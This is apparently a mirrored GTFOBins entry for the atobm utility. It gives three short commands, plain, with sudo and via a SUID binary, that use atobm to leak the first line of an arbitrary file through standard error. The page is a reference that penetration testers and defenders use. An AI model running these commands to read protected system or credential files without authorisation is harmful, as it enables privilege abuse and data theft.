1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/atobm.md
Michalis Papadopoullos 4f11ca6a15
Add atobm
2021-01-17 23:11:43 +01:00

525 B

description functions
Outputs the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`.
file-read sudo suid
code
LFILE=file_to_read atobm $LFILE 2>&1 | awk -F "'" '{printf "%s", $2}'
code
LFILE=file_to_read sudo atobm $LFILE 2>&1 | awk -F "'" '{printf "%s", $2}'
code
LFILE=file_to_read ./atobm $LFILE 2>&1 | awk -F "'" '{printf "%s", $2}'